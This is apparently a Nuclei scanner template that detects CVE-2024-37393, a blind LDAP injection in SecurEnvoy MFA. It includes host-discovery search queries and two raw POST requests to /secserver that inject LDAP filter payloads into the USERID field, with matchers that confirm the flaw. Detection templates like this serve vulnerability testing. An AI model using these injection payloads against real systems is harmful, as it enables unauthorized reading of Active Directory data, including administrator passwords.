SecurEnvoy Two Factor Authentication - LDAP Injection

id: CVE-2024-37393
info:
  name: SecurEnvoy Two Factor Authentication - LDAP Injection
  author: securityforeveryone
  severity: critical
  description: |
    Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
  reference:
    - https://www.tenable.com/cve/CVE-2024-37393
    - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393
    - https://securenvoy.com
  metadata:
    verified: true
    shodan-query: title:"SecurEnvoy"
    fofa-query: title="SecurEnvoy"
  tags: cve,cve2024,securenvoy,ldap

variables:
  userid: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /secserver/? HTTP/2
        Host: {{Hostname}}

        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:{{userid}})(sAMAccountName=*
        MEMBEROF:Domain Users

      - |
        POST /secserver/? HTTP/2
        Host: {{Hostname}}

        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:*)(sAMAccountName=*
        MEMBEROF:Domain Users

    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'Error checking Group')"
          - "status_code_1 == 200"
          - "contains(body_2, 'GETPASSCODE')"
          - "status_code_2 == 200"
        condition: and
# digest: 490a0046304402207956ded5a27d1c12f6487316e5b14bb02bb6977fa43bc048e1a21ac9010125480220063cb9fbb223d773537cc685ba85640b97d10412c97695ac541f5ecbac760bbd:922c64590222798bb761d5b6d8e72950